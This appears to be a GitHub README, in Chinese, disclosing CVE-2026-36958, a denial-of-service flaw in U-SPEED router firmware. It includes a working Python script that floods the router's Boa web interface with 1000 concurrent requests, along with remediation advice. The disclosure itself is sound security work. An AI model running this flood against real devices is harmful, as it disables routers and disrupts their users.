kirubel-cve/CVE-2026-36958
GitHub: kirubel-cve/CVE-2026-36958
CVE-2026-36958 的概念验证代码,演示了如何通过并发 HTTP 请求对 U-SPEED 路由器的 Boa Web 服务器发起拒绝服务攻击。
Stars: 0 | Forks: 0
# CVE-2026-36958:通过并发 HTTP 请求导致拒绝服务
**CVE ID:** CVE-2026-36958
**日期:** 2026-04-29
**发现者:** Kirubel Solomne
**供应商:** U-SPEED
**产品:** U-SPEED 路由器
**固件版本:** V1.0.0
**CWE:** CWE-400 - 不受控制的资源消耗
## 描述
U-SPEED 路由器固件 V1.0.0 存在拒绝服务漏洞。通过向 Web 管理界面上的随机或不存在的 endpoint 发送大量并发 HTTP 请求,攻击者可以耗尽嵌入式 Boa HTTP 服务器中的系统资源。这会导致路由器的 Web 界面变得无响应,可能需要手动重启才能恢复正常运行。
## CVSS 评分
**CVSS v3.1 评分: 7.5 (高危)**
`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`
| 指标 | 值 |
|---|---|
| 攻击途径 | 网络 |
| 攻击复杂度 | 低 |
| 权限要求 | 无 |
| 用户交互 | 无 |
| 机密性影响 | 无 |
| 完整性影响 | 无 |
| 可用性影响 | 高 |
## 概念验证
```
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router web interface is still responsive.")
```
**预期行为:** 服务器应正常处理并发连接。
**实际行为:** Web 界面变得无响应;需要手动重启。
## 影响
- Web 管理界面变得不可用
- 可能会中断路由服务
- 需要手动重启以恢复功能
## 修复建议
- 在 Boa web 服务器上实施连接速率限制
- 限制每个源 IP 的最大并发连接数
- 添加自动恢复/看门狗 (watchdog) 机制
## 披露时间线
| 日期 | 事件 |
|---|---|
| 2026-04-29 | 发现漏洞 |
| 2026-04-29 | 报告给 MITRE |
| 2026-04-29 | 分配 CVE-2026-36958 |
| 2026-04-29 | 公开披露 |
## 参考
- [MITRE CVE-2026-36958](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-36958)
- [CWE-400](https://cwe.mitre.org/data/definitions/400.html)
- [供应商网站](http://u-speed.com)
标签:Boa Web服务器, CPU/内存耗尽, CVE-2026-36958, CVSS 7.5, CWE-400, DDoS, DoS, IoT安全, PoC, Python, U-SPEED路由器, Web管理界面, 嵌入式设备, 并发HTTP请求, 并发连接, 拒绝服务, 无后门, 暴力破解, 漏洞披露, 网络安全, 资源耗尽, 路由器安全, 逆向工具, 隐私保护, 高严重性漏洞